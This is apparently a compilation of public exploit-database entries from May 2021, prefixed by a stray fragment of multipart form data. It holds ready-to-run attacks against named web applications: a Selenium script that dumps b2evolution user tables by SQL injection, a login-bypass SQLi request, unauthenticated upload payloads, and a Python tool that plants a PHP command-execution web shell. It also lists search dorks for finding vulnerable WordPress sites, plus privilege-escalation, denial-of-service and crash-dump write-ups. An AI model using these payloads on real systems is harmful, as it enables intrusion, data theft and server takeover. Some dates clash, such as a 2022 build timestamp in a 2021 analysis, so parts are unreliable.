-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_description"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_key"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="tags"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_available"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_expiry"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="items_per_page"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

display_pagetitle
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

display_child_categories
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

display_items
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"

__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[child_categories_sortby]"

date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[items_sortby]"

date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read_everyone"

everyone
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"

1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"

2
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"

3
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_write[]"

1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_selection"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_upload"; filename=""
Content-Type: application/octet-stream


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_path"


-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_url"


-----------------------------280033592236615772622294478489--
-
Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
# Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
# Author: h4shur
# Date: 2021-05-06
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/wp-super-edit/
# Version: 2.5.4 and earlier
# Tested on: Windows 10 & Google Chrome
# Category: Web Application Bugs
# Dorks:
#   inurl:"wp-content/plugins/wp-super-edit/superedit/"
#   inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/"

### Note:
# Technical Description: The WordPress plugin "wp-super-edit" bundles a copy of FCKeditor, and the FCKeditor file manager it ships lets an attacker upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files are a significant risk to applications: the first step in many attacks is to get some code onto the system to be attacked, after which the attacker only needs a way to get it executed, and an unrestricted upload accomplishes that first step. The consequences of unrestricted file upload vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.

### POC:
The FCKeditor file-manager pages bundled under the plugin directory:
* Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html
* Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html
* Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html
* Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
-
Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
# Exploit Title: Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation
# Date: 04.05.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.epicgames.com https://www.easy.ac

Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation

Vendor: Epic Games, Inc.
Product web page: https://www.epicgames.com https://www.easy.ac
Affected version: 4.0.0.0

Summary: Easy Anti-Cheat is the industry-leading anti-cheat service, countering hacking and cheating in multiplayer PC games through the use of hybrid anti-cheat mechanisms.

Desc: The application suffers from an unquoted search path issue affecting the Windows service 'EasyAntiCheat', deployed as part of the Easy Anti-Cheat Service application. This could allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt requires the local user to be able to place their code in the system root path, undetected by the OS or other security applications, where it could be executed when the service starts or at reboot. If successful, the local user's code would run with the elevated privileges of the application; the service runs as LocalSystem. Note that the service is DEMAND_START, so a planted binary would run when something starts the service (a game launch), not automatically at boot.

Tested on: Microsoft Windows 10

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Advisory ID: ZSL-2021-5652
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5652.php

04.05.2021

--

C:\Users>sc qc EasyAntiCheat
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EasyAntiCheat
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EasyAntiCheat
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
b2evolution 7-2-2 - 'cf_name' SQL Injection
# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.06.2021
# Vendor: https://b2evolution.net/
# Link: https://b2evolution.net/downloads/7-2-2
# CVE: CVE-2021-28242
# Proof: https://streamable.com/x51kso

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28242
# Requires the selenium package and a chromedriver matching the installed Chrome.
from selenium import webdriver
from selenium.webdriver.common.by import By
import time

# Vendor: https://b2evolution.net/
website_link = ("http://192.168.1.3/b2evolution/index.php?disp=login"
                "&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2"
                "&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link")
# enter your login username
username = "admin"
# enter your login password
password = "FvsDq7fmHvWF"
# name attribute of the username input field
element_for_username = "x"
# name attribute of the password input field
element_for_password = "q"
# name attribute of the submit button
element_for_submit = "login_action[login]"

browser = webdriver.Chrome()     # Chrome users
# browser = webdriver.Safari()   # macOS users (others use Chrome via chromedriver)
# browser = webdriver.Firefox()  # Firefox users
browser.get(website_link)
try:
    # Selenium 4 removed find_element_by_name(); find_element(By.NAME, ...) replaces it
    username_element = browser.find_element(By.NAME, element_for_username)
    username_element.send_keys(username)
    password_element = browser.find_element(By.NAME, element_for_password)
    password_element.send_keys(password)
    sign_in_button = browser.find_element(By.NAME, element_for_submit)
    sign_in_button.click()
    # Exploit the vulnerability: obtain sensitive database information by
    # injecting SQL into the "cf_name" parameter of the collections filter
    time.sleep(7)
    # Receiving sensitive info for evo_users
    browser.get("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")
    time.sleep(7)
    # Receiving sensitive info for evo_blogs
    browser.get("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")
    time.sleep(7)
    # Receiving sensitive info for evo_section
    browser.get("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections")
    time.sleep(7)
    browser.quit()
    print("At the time of the exploit, you should have seen information about the tables...\n")
except Exception:
    # This exception occurs if the elements are not found in the web page.
    print("Sorry, your exploit is not working for some reason...")
    browser.quit()
-
Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
# Exploit Title: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-06
# Vendor Homepage: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Plus-x64-v0.7.4.exe
# Tested Version: 0.7.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Sandboxie Service" | findstr /i /v """

Sandboxie Service    SbieSvc    C:\Program Files\Sandboxie-Plus\SbieSvc.exe    Auto

# Service info

sc qc "SbieSvc"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SbieSvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Sandboxie-Plus\SbieSvc.exe
        GRUPO_ORDEN_CARGA  : UIGroup
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Sandboxie Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
-
Voting System 1.0 - Authentication Bypass (SQLI)
# Exploit Title: Voting System 1.0 - Authentication Bypass (SQLI)
# Date: 06/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB

You can simply bypass /admin/login.php with the following SQL injection. All you need is a bcrypt hash that matches a password of your choosing; the username should NOT match an existing username.

########################### Vulnerable code ############################

if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];

    $sql = "SELECT * FROM admin WHERE username = '$username'";
    $query = $conn->query($sql);

    if($query->num_rows < 1){
        $_SESSION['error'] = 'Cannot find account with the username';
    }
    else{
        $row = $query->fetch_assoc();
        echo "DB Password: " . $row['password'];
        echo "<br>";
        echo "<br>";
        echo "Input Password: " . $password;
        if(password_verify($password, $row['password'])){
            echo "Equal";
            $_SESSION['admin'] = $row['id'];
        }
        else{
            echo "not Equal";
            $_SESSION['error'] = 'Incorrect password';
        }
    }
}
else{
    $_SESSION['error'] = 'Input admin credentials first';
}

########################### Payload ############################

POST /admin/login.php HTTP/1.1
Host: 192.168.1.1
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=tliephrsj1d5ljhbvsbccnqmff
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -
-
Sandboxie 5.49.7 - Denial of Service (PoC)
# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
# Date: 06/05/2021
# Author: Erick Galindo
# Vendor Homepage: https://sandboxie-plus.com/
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
# Version: 5.49.7
# Tested on: Windows 10 Pro x64 es

# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Sandboxie Control->Sandbox->Set Container Folder
#3.- Paste the buffer in the input then press ok

buffer = "\x41" * 5000
f = open("Sandboxie10.txt", "w")
f.write(buffer)
f.close()
-
WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
# Exploit Title: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-06
# Vendor Homepage: https://www.gearboxcomputers.com/downloads/wifihotspot.exe
# Tested Version: 1.0.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

MainService    WifiHotSpotSvc    C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe    Auto

# Service info

sc qc wifihotspotsvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: wifihotspotsvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WifiHotSpot\WifiHotSpotService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MainService
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
-
Voting System 1.0 - Remote Code Execution (Unauthenticated)
# Exploit Title: Voting System 1.0 - Remote Code Execution (Unauthenticated)
# Date: 07/05/2021
# Exploit Author: secure77
# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Linux Debian 5.10.28-1kali1 (2021-04-12) x86_64 // PHP Version 7.4.15 & Built-in HTTP server // mysql Ver 15.1 Distrib 10.5.9-MariaDB

Unauthenticated file upload is possible via /admin/candidates_add.php, which can be used for RCE. The upload is stored under /images/ and is also accessible without authentication.

########################### Vulnerable code ############################

<?php
include 'includes/session.php';

if(isset($_POST['add'])){
    $firstname = $_POST['firstname'];
    $lastname = $_POST['lastname'];
    $position = $_POST['position'];
    $platform = $_POST['platform'];

    $filename = $_FILES['photo']['name'];

    if(!empty($filename)){
        move_uploaded_file($_FILES['photo']['tmp_name'], '../images/'.$filename);
    }

    $sql = "INSERT INTO candidates (position_id, firstname, lastname, photo, platform) VALUES ('$position', '$firstname', '$lastname', '$filename', '$platform')";
    if($conn->query($sql)){
        $_SESSION['success'] = 'Candidate added successfully';
    }
    else{
        $_SESSION['error'] = $conn->error;
    }
}
else{
    $_SESSION['error'] = 'Fill up add form first';
}

header('location: candidates.php');
?>

########################### Payload ############################

POST /admin/candidates_add.php HTTP/1.1
Host: 192.168.1.1
Content-Length: 275
Cache-Control: max-age=0
Origin: http://192.168.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo exec("whoami"); ?>
------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add"
-
Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
# Date: 04-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
# Version: 0.1
# Tested on: PHP 7.4.11 , Linux x64_x86

############################################################################################################
# Description:
# The web application allows for an unauthenticated file upload which can result in Remote Code Execution.
############################################################################################################

# Proof of concept:

#!/usr/bin/python3

import requests
import sys
from bs4 import BeautifulSoup


def find_shell(domain):
    req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
    soup = BeautifulSoup(req_2.content, "html.parser")
    imgs = soup.find_all("img")
    for i in imgs:
        src = i['src']
        if ("shell.php" in src):
            print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
            break
        else:
            continue


def upload_file(domain):
    print("\n [!] Uploading Shell . . .")
    payload = """
<!DOCTYPE html>
<html>
<head>
<title> Shell </title>
</head>
<body>
<form action="#" method="post">
<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">
<br><br>
<input type="submit" name="submit" value="execute">
</form>
<?php
$cmd = $_POST['cmd'];
$result = shell_exec($cmd);
echo "<pre>{$result}</pre>";
?>
</body>
</html>
"""
    h = { "Content-Type" : "multipart/form-data" }
    f = {'employee_image': ('shell.php', payload, 'application/x-php', {'Content-Disposition': 'form-data'})}
    d = {
        "emplo" : "",
        "employee_companyid" : "test",
        "employee_firstname" : "test",
        "employee_lastname" : "test",
        "employee_middlename" : "test",
        "branches_datefrom" : "0011-11-11",
        "branches_recentdate" : "2222-11-11",
        "employee_position" : "test",
        "employee_contact" : "23123132132",
        "employee_sss" : "test",
        "employee_tin" : "test",
        "employee_hdmf_pagibig" : "test",
        "employee_gsis" : "test"
    }
    url = domain + "/Admin_Dashboard/process/addemployee_process.php"
    req = requests.post(url, data=d, files=f)
    if req.status_code == 200:
        if ("Insert Successfully" in req.text):
            print("\n [!] Shell uploaded successfully\n")
            find_shell(domain)
        else:
            print("Exploit Failed 1")


def main():
    if len(sys.argv) != 2:
        print('[!] usage: %s <target url> ' % sys.argv[0])
        print('[!] eg: %s http://vulndomain.com' % sys.argv[0])
        sys.exit(-1)

    print("<><><><><><><><><><><><><><><><><><><><><><><><>")
    print("<>    Human Resource Information System       <>")
    print("<>              Shell Uploader                <>")
    print("<><><><><><><><><><><><><><><><><><><><><><><><>")
    target_domain = sys.argv[1]
    upload_file(target_domain)


if __name__ == "__main__":
    main()
-
Epic Games Rocket League 1.95 - Stack Buffer Overrun
# Exploit Title: Epic Games Rocket League 1.95 - Stack Buffer Overrun
# Date: 25.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.epicgames.com https://www.rocketleague.com

Epic Games Rocket League 1.95 (AK::MemoryMgr::GetPoolName) Stack Buffer Overrun

Vendor: Epic Games Inc. | Psyonix, LLC
Product web page: https://www.epicgames.com
                  https://www.psyonix.com
                  https://www.rocketleague.com
Affected version: <=1.95

Summary: Rocket League is a high-powered hybrid of arcade-style soccer and vehicular mayhem with easy-to-understand controls and fluid, physics-driven competition.

Desc: The game suffers from a stack-based buffer overflow vulnerability. The issue is caused by a boundary error in the processing of a UPK format file, which can be exploited to cause a stack buffer overflow when a user crafts the file with a large array of bytes inserted at an offset shortly after the magic header. Successful exploitation could allow execution of arbitrary code on the affected machine.

Tested on: Microsoft Windows 10

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5651
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5651.php

25.04.2021

--

Craft location: ..\rocketleague\TAGame\CookedPCConsole
Header: C1 83 2A 9E 64 03 1F 00

hat_Headphones_SF.upk:
----------------------

...
...
ModLoad: 00007ff9`99ff0000 00007ff9`9a016000   C:\WINDOWS\system32\ncryptsslp.dll
ModLoad: 00007ff9`32d70000 00007ff9`36a00000   C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_e9f7884f9b4f82b9\igd9dxva64.dll
ModLoad: 00007ff9`315b0000 00007ff9`32d68000   C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvd3dumx.dll
ModLoad: 00000000`00400000 00000000`0041e000   E:\Epic Games\rocketleague\Binaries\Win64\XINPUT1_3.dll
ModLoad: 00007ff9`8dac0000 00007ff9`8db6c000   C:\WINDOWS\SYSTEM32\TextShaping.dll
[0110.33] Log: Timed out while waiting for GPU to catch up. (500 ms)
(62c.1074): Unknown exception - code 00000001 (!!! second chance !!!)
KERNELBASE!RaiseException+0x69:
00007ff9`a0364b59 0f1f440000      nop     dword ptr [rax+rax]
0:024> r
rax=00007ff99feeb925 rbx=0000000000000000 rcx=0000000000000000
rdx=000000214edfe8b0 rsi=000000214edfef50 rdi=000000214edfe700
rip=00007ff9a0364b59 rsp=000000214edfef30 rbp=0000000000000000
 r8=000000214edfedb0  r9=0000000000000000 r10=00000000000000c0
r11=000000214edfee2e r12=0000000000000000 r13=00007ff776205bb0
r14=00007ff776dab710 r15=000000214edff8a0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000204
KERNELBASE!RaiseException+0x69:
00007ff9`a0364b59 0f1f440000      nop     dword ptr [rax+rax]
0:024> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for E:\Epic Games\rocketleague\Binaries\Win64\EOSSDK-Win64-Shipping.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvwgf2umx.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Epic Games\Launcher\Portal\Extras\Overlay\EOSOVH-Win64-Shipping.dll -
GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2
DUMP_QUALIFIER: 0

FAULTING_IP:
KERNELBASE!RaiseException+69
00007ffe`d4d64b59 0f1f440000      nop     dword ptr [rax+rax]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffed4d64b59 (KERNELBASE!RaiseException+0x0000000000000069)
   ExceptionCode: 00000001
  ExceptionFlags: 00000000
NumberParameters: 0

FAULTING_THREAD:  00000490
DEFAULT_BUCKET_ID:  APPLICATION_FAULT
PROCESS_NAME:  RocketLeague.exe
ERROR_CODE: (NTSTATUS) 0x1 - STATUS_WAIT_1
EXCEPTION_CODE: (Win32) 0x1 (1) - Incorrect function.
EXCEPTION_CODE_STR:  1
WATSON_BKT_PROCSTAMP:  606f6afa
WATSON_BKT_PROCVER:  1.0.10897.0
PROCESS_VER_PRODUCT:  Rocket League
WATSON_BKT_MODULE:  KERNELBASE.dll
WATSON_BKT_MODSTAMP:  2f2f77bf
WATSON_BKT_MODOFFSET:  34b59
WATSON_BKT_MODVER:  10.0.19041.906
MODULE_VER_PRODUCT:  Microsoft® Windows® Operating System
BUILD_VERSION_STRING:  10.0.19041.928 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH:  ac197712fdc57f2bb67f9b17107e5701c93b4362
MODLIST_SHA1_HASH:  342698e051c108fd7be71346f5d34f8a14c38381
NTGLOBALFLAG:  0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS:  0
PRODUCT_TYPE:  1
SUITE_MASK:  784
DUMP_TYPE:  fe
ANALYSIS_SESSION_HOST:  LAB17
ANALYSIS_SESSION_TIME:  04-25-2021 13:23:34.0003
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE:  ENU
PROBLEM_CLASSES:
    ID:     [0n308]
    Type:   [APPLICATION_FAULT]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [Unspecified]
    Frame:  [0]
BUGCHECK_STR:  APPLICATION_FAULT
PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT
LAST_CONTROL_TRANSFER:  from 00007ff78f1cbf65 to 00007ffed4d64b59

STACK_TEXT:
00000089`23dfe910 00007ff7`8f1cbf65 : 00007ff7`9123b710 00000000`000002f8 00007ff7`906e5190 00000089`23dfea20 : KERNELBASE!RaiseException+0x69
00000089`23dfe9f0 00007ff7`8f190215 : 00000089`23dff710 00000089`23dff5d0 00000089`23dff710 00007ffe`d72ee25f : RocketLeague!GetOutermost+0x29245
00000089`23dff250 00007ff7`8f123466 : 00000089`23dff710 00007ff7`906eb668 00000199`6cf33e40 00000089`23dfe828 : RocketLeague!AK::MusicEngine::Term+0xfce95
00000089`23dff4d0 00007ff7`8f1297f9 : 0000019a`00000001 00000000`00000000 00000089`23dff770 00000199`00000001 : RocketLeague!AK::MusicEngine::Term+0x900e6
00000089`23dff6d0 00007ff7`8f1d1e40 : 00000000`00000001 00000000`00000001 0000019a`00000000 00000199`6d26ffd0 : RocketLeague!AK::MusicEngine::Term+0x96479
00000089`23dff850 00007ffe`d6297034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!Scaleform::System::Init+0x11c0
00000089`23dff880 00007ffe`d7302651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000089`23dff8b0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

THREAD_SHA1_HASH_MOD_FUNC:  b03d2da27c20caaf2a76cdae45ff251160c76115
THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  ff5c11b082c48239ef2666814fc4e06663a8c892
THREAD_SHA1_HASH_MOD:  96a23e97d7538141fe1b904de60919531df8b505

FOLLOWUP_IP:
RocketLeague!GetOutermost+29245
00007ff7`8f1cbf65 eb13            jmp     RocketLeague!GetOutermost+0x2925a (00007ff7`8f1cbf7a)

FAULT_INSTR_CODE:  8b4813eb
SYMBOL_STACK_INDEX:  1
SYMBOL_NAME:  rocketleague!GetOutermost+29245
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: RocketLeague
IMAGE_NAME:  RocketLeague.exe
DEBUG_FLR_IMAGE_TIMESTAMP:  606f6afa
STACK_COMMAND:  ~24s ; .cxr ; kb
FAILURE_BUCKET_ID:  APPLICATION_FAULT_1_RocketLeague.exe!GetOutermost
BUCKET_ID:  APPLICATION_FAULT_rocketleague!GetOutermost+29245
FAILURE_EXCEPTION_CODE:  1
FAILURE_IMAGE_NAME:  RocketLeague.exe
BUCKET_ID_IMAGE_STR:  RocketLeague.exe
FAILURE_MODULE_NAME:  RocketLeague
BUCKET_ID_MODULE_STR:  RocketLeague
FAILURE_FUNCTION_NAME:  GetOutermost
BUCKET_ID_FUNCTION_STR:  GetOutermost
BUCKET_ID_OFFSET:  29245
BUCKET_ID_MODTIMEDATESTAMP:  606f6afa
BUCKET_ID_MODCHECKSUM:  251425f
BUCKET_ID_MODVER_STR:  1.0.10897.0
BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_
FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT
FAILURE_SYMBOL_NAME:  RocketLeague.exe!GetOutermost
WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/RocketLeague.exe/1.0.10897.0/606f6afa/KERNELBASE.dll/10.0.19041.906/2f2f77bf/1/00034b59.htm?Retriage=1
TARGET_TIME:  2021-04-25T11:23:44.000Z
OSBUILD:  19042
OSSERVICEPACK:  928
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE:  x64
OSNAME:  Windows 10
OSEDITION:  Windows 10 WinNt SingleUserTS Personal
USER_LCID:  0
OSBUILD_TIMESTAMP:  2022-01-18 11:29:28
BUILDDATESTAMP_STR:  160101.0800
BUILDLAB_STR:  WinBuild
BUILDOSVER_STR:  10.0.19041.928
ANALYSIS_SESSION_ELAPSED_TIME:  795d
ANALYSIS_SOURCE:  UM
FAILURE_ID_HASH_STRING:  um:application_fault_1_rocketleague.exe!getoutermost
FAILURE_ID_HASH:  {ee1c73f7-ce6b-9e4a-8e1b-66937ecee43c}
Followup:     MachineOwner

...
...
(aa0.3818): Unknown exception - code 00000001 (first chance)
(aa0.3818): Unknown exception - code 00000001 (!!! second chance !!!)
KERNELBASE!RaiseException+0x69:
00007ffe`d4d64b59 0f1f440000      nop     dword ptr [rax+rax]
0:024> g
[0188.65] Warning: Warning, Detected data corruption [header] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook.
[0188.65] Critical: appError called: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'
[0188.65] Critical: Windows GetLastError: The operation completed successfully. (0)
[0188.65] Warning: Warning, Detected data corruption [undershoot] trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook.
[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'
